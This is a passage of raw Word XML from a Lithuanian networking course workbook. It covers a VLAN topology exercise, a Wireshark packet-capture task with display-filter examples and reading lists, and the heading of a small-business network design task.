          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateiktą tinklo topologiją naudodamiesi komandos eilute ir pateikite įrenginių sąrašą su tinklo nuostatomis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B27F3" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pastaba</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: topologijai įgyvendinti naudokite programinę įrangą Cisco Packet Tracer arba turimo gamintojo fizinę įrangą, kurioje galimas VLAN konfigūravimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77587508" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BA2D2D6" wp14:editId="4DB4ADE4">
            <wp:extent cx="5233034" cy="3211768"/>
            <wp:effectExtent l="0" t="0" r="5715" b="825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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5233034" cy="3211768"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EB95B" w14:textId="33E523ED" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00A433BD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Tinklo topologija su VLAN ir tinklo paslaugomis DNS, HTTP, FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59699EDD" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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44007713" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E4F83B" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN Configuration Commands Step by Step Explained. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer networking notes.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId184">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B13D197" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">InterVLAN Routing. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Networklessons.com</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId185">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://networklessons.com/switching/intervlan-routing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="525C65BF" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB82CB3" w14:textId="12B600C8" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00973404"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1</w:t>
      </w:r>
      <w:r w:rsidR="00D44385" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PAKETŲ ANALIZĖ SU WIRESHARK</w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D97A079" w14:textId="6CF6B575" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA: Atsisiųskite, į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>diekite ir įsijunkite Wireshark programinę įrangą. Paleiskite paketų įrašymą. Įraš</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dami paketus išmėginkite įvairias paslaugas, protokolus, įrankius (pvz.: http, ftp, ssh, dhcp, arp, ping, tracert). Sustabdykite paketų įrašymą ir panaudodami filtrus pateikite informaciją apie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF42CCF" w14:textId="4F9C388C" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Naudotų protokolų išklotines pagal protokolo pavadinimą ir protokolo prievadą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(pvz., http, ftp ir pan. ir tcp.port==80)</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67B56C" w14:textId="37323431" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP įrašus </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(pvz.: bootp.option.type == 53)</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA7E13A" w14:textId="1C0913C5" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinio ir paskirties IP (savo ir kitų IP) adresų išklotines </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(pvz.: ip.src==192.168.1.1)</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278449E" w14:textId="4A2C8819" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kadrus, kurie turi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">informaciją su raktiniais žodžiais „page“ „google“ (pridėkite, pasiūlykite savo) </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(pvz.: frame contains "page")</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED0D01" w14:textId="226C4760" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kadrus, kurie mažesni nei 100; didesni nei 1000; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(pvz.: frame.len &gt; 10)</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5318D4A1" w14:textId="2EFAF2BC" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kadrus su kompiuterio MAC adreso paskirties ir tikslo vietomis </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(pvz.: eth.src==[MAC])</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1F93B" w14:textId="293BB983" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Informaciją apie samba protokolo išsaugotą informaciją</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E336FC" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kitas išklotines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C12069" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79054531" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C5BF7" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Wireshark. Network protocol analyzer.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId186">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.wireshark.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58A0F39D" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Orgera S. (2020, liepos 8). How to Use Wireshark: A Complete Tutorial. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lifewire. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId187">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.lifewire.com/wireshark-tutorial-4143298</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31AEA28E" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Hoffman C. (2017, birželio 14). How to Use Wireshark to Capture, Filter and Inspect Packets. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">How-To Geek. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId188">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="139EF73B" w14:textId="051A6CE8" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68768992" w14:textId="321A8EBA" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4"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lastRenderedPageBreak/>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NEDELĖS ĮMONĖS TINKLO SUDARYMAS. TINKLO PROJEKTAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26889B01" w14:textId="7DCCBC64" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
